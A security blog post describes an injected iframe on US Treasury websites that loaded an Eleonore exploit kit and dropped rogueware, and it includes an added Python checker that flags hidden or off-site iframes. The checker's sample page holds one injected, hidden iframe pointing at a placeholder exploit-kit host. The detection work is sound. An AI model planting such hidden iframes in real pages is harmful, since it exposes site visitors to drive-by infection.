Updated @ 8PM PST 5/3/2010 — Added Information about Rogueware and two additional government sites affected
Time and time again we talk about how amateur and professional hackers alike use automated toolkits that identify security vulnerabilities on a computer and exploit them with little or no technical skill required of the cyber criminal. The script kiddies behind these kits have been wreaking havoc on the Internet, as many of the kits can be downloaded for free in underground forums. Today we came across an iframe embedded in the Department of the Treasury website. This iframe (pictured below) silently loads the main URL of an Eleonore exploit kit, which in turn determines the best available exploitation method for the browser accessing the site.
US Treasury Website – Injected iframe
Upon accessing the US Treasury website (treas.gov, bep.gov, or moneyfactory.gov), the iframe silently redirects victims through statistics servers and exploit packs, which carry the victim into the second stage of the attack.
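The defensive counterpart to what the screenshots show is a site-integrity check that flags iframes a page owner did not put there. The following is an added example, not PandaLabs' code or any tool from the post: it parses a page with Python's standard-library HTML parser and reports iframes that are either hidden (zero-size, display:none, pushed off-screen) or point at a host outside the site's own domains. The allow-list of hosts, the sample page and the `exploit-kit.example` hostname are all constructed placeholders for illustration.

```python
"""Flag hidden or off-site iframes in a page: a simple integrity check for web masters."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that are allowed to appear in an iframe on these sites (assumed allow-list).
SITE_HOSTS = {"treas.gov", "www.treas.gov", "bep.gov", "moneyfactory.gov"}

# Constructed sample page: one legitimate iframe and one injected, hidden, off-site one.
SAMPLE_PAGE = """<html><body>
<h1>Bureau of Engraving and Printing</h1>
<iframe src="https://www.treas.gov/widgets/rates.html" width="400" height="300"></iframe>
<iframe src="http://exploit-kit.example/in.php" width="0" height="0" style="display:none"></iframe>
</body></html>"""


def _is_hidden(attrs: dict) -> bool:
    """Heuristics for an iframe the visitor is not meant to see."""
    style = (attrs.get("style") or "").lower().replace(" ", "")
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        # Attribute form: width="0"
        val = attrs.get(dim)
        if val is not None:
            m = re.match(r"(\d+)", str(val))
            if m and int(m.group(1)) <= 1:
                return True
        # Inline-style form: width:0px
        m = re.search(rf"{dim}:(\d+)px", style)
        if m and int(m.group(1)) <= 1:
            return True
    # Positioned far off-screen
    m = re.search(r"(?:left|top):(-\d+)px", style)
    if m and int(m.group(1)) <= -1000:
        return True
    return False


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def find_suspicious_iframes(html: str, own_hosts=SITE_HOSTS):
    """Return a list of findings for iframes that are hidden or point off-site."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or ""
        external = bool(host) and host not in own_hosts
        hidden = _is_hidden(attrs)
        if external or hidden:
            findings.append({"src": src, "external": external, "hidden": hidden})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_PAGE):
        print(f"suspicious iframe: {finding}")
```

Run it against a copy of each page served to the public (or against the output of a periodic crawl) and alert on any finding; an injected iframe of the kind shown in the screenshot above trips both the hidden and the off-site checks.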
US Treasury Website Hack (Session Log)
In my case, the exploit kit figured that Java was the best method of infecting my test machine, although several exploitation methods (mainly PDF) are used by these kits. It's still unclear what the original entry point into the US Treasury website was, and I don't suspect that the US Government will release a detailed report about the compromise, but these threats usually make their way onto websites through outdated server software or web applications, and/or through web application security vulnerabilities such as SQL injection.
After you are infected, your web browser will start redirecting you to ads and other nasty things, such as Rogueware:

I would like to use this post to remind you all to update your web applications and web servers just as frequently as you would your own computer. Doing so will help prevent your website from being hacked and used to propagate these threats on the Internet. You, your visitors, and many others browsing the Internet will be one step closer to a safer browsing experience.
Do these researchers contact the victims before they announce these findings?
Yes, Sean-Paul contacted the victims before publishing anything. Good question though.